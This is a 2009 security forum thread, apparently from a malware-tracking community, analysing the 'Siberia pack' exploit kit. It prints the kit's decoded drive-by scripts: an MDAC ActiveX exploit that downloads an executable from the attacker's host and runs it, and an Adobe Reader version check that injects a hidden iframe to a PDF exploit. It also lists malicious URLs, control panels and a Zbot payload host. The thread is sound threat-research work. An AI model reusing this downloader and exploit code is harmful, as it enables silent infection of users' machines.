Author Topic: Siberia pack  (Read 8712 times)


December 20, 2009, 09:06:14 pm

SysAdMini

Just discovered another exploit kit.

According to its control panel
Code: [Select]
www.useranalyticsreporting.net/ir/pack/stat.php
it's "Siberia pack"

I wouldn't label it "kit", because it contains only a single exploit for MDAC.

Obfuscated script starts here:
Code: [Select]
www.useranalyticsreporting.net/ir/pack/
This is the decoded script:
Code: [Select]
                      url = 'http://www.useranalyticsreporting.net:80/ir/pack/exe.php?spl=MDAC';
                                            function mdac() {
  url = '';
                      function CreateO(o,n){
                                var r=null;
                                try{r=o.CreateObject(n)}catch(e){}
                                if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
                                if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
                                if(!r){try{r=o.GetObject('',n)}catch(e){}}
                                if(!r){try{r=o.GetObject(n,'')}catch(e){}}
                                if(!r){try{r=o.GetObject(n)}catch(e){}}
                                return(r);
                        }
                        function Go(a){
                                var eurl='http://www.useranalyticsreporting.net:80/ir/pack/exe.php?spl=MDAC';
                                var fname='hfdhfd.exe';
                                var fso=CreateO(a,'Scripting.FileSystemObject')
                                var sap=CreateO(a,'Shell.Application');
                                var x=CreateO(a,'ADODB.Stream');
                                var nl=null;
                                fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
                                x.Mode=3;
                                try{nl=CreateO(a,'Micr'+'osoft.XMLH'+'TTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=CreateO(a,'MSXML2.XMLHTTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=CreateO(a,'MSXML2.ServerXMLHTTP');nl.open('GET',eurl,false);}
                                catch(e){try{nl=new XMLHttpRequest();nl.open('GET',eurl,false);}
                                catch(e){return 0;}}}}
                                x.Type=1;
                                nl.send(null);
                                rb=nl.responseBody;
                                x.Open();
                                x.Write(rb);
                                x.SaveTofile(fname,2);
                                sap.ShellExecute(fname);
                                return 1;
                        }
                        function mdac() {
                                var i=0;
                                var target=new Array(
                                'BD96C556-65A3-11D0-983A-00C04FC29E36',
                                'BD96C556-65A3-11D0-983A-00C04FC29E30',
                                'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
                                '0006F033-0000-0000-C000-000000000046',
                                '0006F03A-0000-0000-C000-000000000046',
                                '6e32070a-766d-4ee6-879c-dc1fa91d2fc3',
                                '6414512B-B978-451D-A0D8-FCFDF33E833C',
                                '7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
                                '06723E09-F4C2-43c8-8358-09FCD1DB0766',
                                '639F725F-1B2D-4831-A9FD-874847682010',
                                'BA018599-1DB3-44f9-83B4-461454C84BF8',
                                'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
                                'E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
                                while(target[i]){
                                        var a=null;
                                        a=document.createElement('object');
                                        a.setAttribute('classid','clsid:'+target[i]);
                                        if(a){try{var b=CreateO(a,'Shell.Application');if(b){Go(a);}}catch(e){}}
                                        i++;
                                }
                                return 0;
                        }
function lala1() {
return mdac();
}
function lala2() {
return lala1();
}
                        function lala3() {
return lala2();
}
function lala4() {
return lala3();
}
function lala5() {
return lala4();
}
lala5();
}
mdac();


The payload isn't detected by any AV product currently.
http://www.virustotal.com/analisis/1d25db57afd24594c98399e1bfc24da13fc88f2a4367f0609753ef8fb2e726d1-1261341921
http://www.threatexpert.com/report.aspx?md5=8e36fdfa3a6fdc319d2fa8a5948fc481
Ruining the bad guy's day

December 20, 2009, 09:32:21 pm
Reply #1

Garlando

It contains a PDF exploit too.


December 20, 2009, 09:36:49 pm
Reply #2

SysAdMini

It contains a PDF exploit too.



Yes, you are right. I missed the second part of the script.

Code: [Select]
// Second stage of the same page: a version gate in front of the PDF exploit.
// It creates an <object> bound to clsid CA8A9780-280D-11CF-A24D-444553540000
// (presumably the Adobe Reader/Acrobat ActiveX control, since the page it
// then loads is exp/pdf.php — confirm) and calls the control's GetVersions(),
// which the code treats as a comma-separated list of "key=value" fields.
// Field index 4 is split on '=', the text before the first '.' of its value
// is taken as the major version (a string, coerced to a number by <= / >=),
// and when it lies in 6..9 an invisible 10x10 iframe pointing at exp/pdf.php
// is written into the document. Every error — control missing, unexpected
// GetVersions layout — is silently swallowed, so on a host without the
// control this is a no-op. The randomised identifier names come from the
// obfuscator; the clsid string and the iframe markup are the stable parts
// worth signaturing on.
function i7WVT41lG441T() {
try {
var fFSllQ4 = document.createElement("object");
fFSllQ4.setAttribute("id","fFSllQ4");
fFSllQ4.setAttribute("classid","clsid:CA8A9780-280D-11CF-A24D-444553540000");
var yDViqkIoIr = fFSllQ4.GetVersions();
yDViqkIoIr = yDViqkIoIr.split(",");
yDViqkIoIr = yDViqkIoIr[4].split("=");  // relies on a fixed field position; brittle
yDViqkIoIr = yDViqkIoIr[1];
eC5Y3hfycXHm2N = yDViqkIoIr.split(".");  // implicit global (no var)
eC5Y3hfycXHm2N = eC5Y3hfycXHm2N[0];
if ((eC5Y3hfycXHm2N <= 9) && (eC5Y3hfycXHm2N >= 6)) {
document.write("<iframe width='10' height='10' frameborder='0' src='exp/pdf.php'></iframe>");
}
} catch(e) {}
}
     i7WVT41lG441T();

Ruining the bad guy's day

December 20, 2009, 10:43:33 pm
Reply #3

SysAdMini

Malwareurl.com has also listed a Siberia pack today:

Code: [Select]
traffic.banners.od.ua/p/
traffic.banners.od.ua/p/exp/pdf.php
traffic.banners.od.ua/p/exe.php?spl=PDF
traffic.banners.od.ua/p/stat.php
Ruining the bad guy's day

December 22, 2009, 05:47:30 pm
Reply #4

SysAdMini

Another one:
Code: [Select]
traffic6.local-tc.com/us/
Control panel:
Code: [Select]
traffic6.local-tc.com/us/stat.php
The payload is a Zbot:
http://www.virustotal.com/de/analisis/9cce5756e0956414144d6ca0079eca7f1e0281428bcf245598f1246edbc521f4-1261502233

Interesting fact:

The related Zeus config file is hosted at priscillapresley.com:
http://www.malwaredomainlist.com/mdl.php?search=priscillapresley.com
Ruining the bad guy's day

December 22, 2009, 05:53:46 pm
Reply #5

danielch1

You can see the traffic from this url:
Code: [Select]
traffic6.local-tc.com/us/sell.php

December 22, 2009, 05:58:41 pm
Reply #6

SysAdMini

You can see the traffic from this url:
Code: [Select]
traffic6.local-tc.com/us/sell.php

Nice one. Thanks.
Ruining the bad guy's day

December 26, 2009, 12:28:05 pm
Reply #7

SysAdMini

Ruining the bad guy's day

May 28, 2010, 05:04:35 pm
Reply #8

SysAdMini

Ruining the bad guy's day